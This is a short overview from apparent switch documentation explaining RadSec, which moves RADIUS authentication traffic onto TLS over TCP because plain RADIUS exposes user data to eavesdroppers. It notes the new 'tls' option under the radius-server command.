Overview of RadSec

RADIUS protocol uses UDP as underlying transport layer protocol. RadSec is a protocol that supports RADIUS over TCP and TLS. In conventional RADIUS requests, security is a concern as the confidential data is sent using weak encryption algorithms. The access requests are in plain text includes information such as user name, IP address and so on. The user password is an encrypted shared secret. As a result, eavesdroppers can listen to these RADIUS requests and collect confidential information. Data protection is necessary in roaming environments where the RADIUS packets travel across multiple administrative domains and untrusted networks.

RadSec mandates TLS to provide a secure, reliable, and a convenient mode of transport for RADIUS requests over unsecure networks.

RadSec module secures the communication between the switch and RADIUS server using TLS connection. Using RADIUS over TLS provides users with the flexibility to host RADIUS servers across geographics and WAN networks.

For enabling RADIUS security, a new CLI option tls is provided under the command radius-server, where tls stands for Transport Layer Security.